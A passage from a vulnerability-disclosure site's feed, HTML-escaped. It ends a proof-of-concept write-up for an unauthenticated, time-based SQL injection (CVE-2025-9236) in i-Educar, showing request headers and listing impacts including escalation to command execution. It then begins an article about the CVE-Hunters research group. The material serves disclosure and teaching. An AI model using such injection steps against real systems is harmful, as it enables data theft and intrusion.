class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;raw&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0a83a672754f7823714134334b1de8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;content&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;dc26c564cb2116d77bda5fff24ba90dc&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex_conf&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;user_groups&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;accounts&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;02&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;f0e9f68f41a0648ed530f80bd72c06&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;cache&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;raw&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;a0364b9e99bb480dd25e1f0284c8555&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;content&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;e91e6348157868de9dd8b25c81aebfb9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;cc45760590da203c5fc3568ecbabd66&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;routes&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;7&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;a2ac3477f8ad14aa750831441325a16&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;facebook&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;};&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;i_educar_session&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Upgrade&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Insecure&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Requests&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dest&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Mode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;navigate&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Site&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;same&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;origin&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;User&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Priority&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;u&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;i&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9236/image.png&amp;#34;
	width=&amp;#34;1149&amp;#34;
	height=&amp;#34;1030&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9236/image_hu_4ffda49109aad67b.png 480w, /p/cve-2025-9236/image_hu_2bdafcc06acaa448.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;267px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-Hunters, The Journey of Aspiring Vulnerability Researchers</title>
        <link>https://www.cvehunters.com/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/</link>
        <guid>https://www.cvehunters.com/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/</guid>
        <description>&amp;lt;h2 id=&amp;#34;introduction&amp;#34;&amp;gt;Introduction
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;At &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://defcon.org/html/defcon-33/dc-33-index.html&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#DEFCON33&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, one of the most prestigious security conferences in the world, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan Morette&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; presented the &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; project, which represents a fundamental change in the way we approach cybersecurity education, transforming the classic dilemma of lack of experience into a concrete learning opportunity.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;With 116 published CVEs, 170 discovered vulnerabilities, and 20 active members in less than a year, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; is a replicable model that is changing lives and improving the security of systems used by millions of people.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;During his classes, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; constantly faced the same question:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;introduction&amp;#34;&amp;gt;Introduction
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;At &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://defcon.org/html/defcon-33/dc-33-index.html&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#DEFCON33&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, one of the most prestigious security conferences in the world, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan Morette&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; presented the &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; project, which represents a fundamental change in the way we approach cybersecurity education, transforming the classic dilemma of lack of experience into a concrete learning opportunity.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;With 116 published CVEs, 170 discovered vulnerabilities, and 20 active members in less than a year, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; is a replicable model that is changing lives and improving the security of systems used by millions of people.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;During his classes, &amp;lt;b&amp;gt;&amp;lt;a 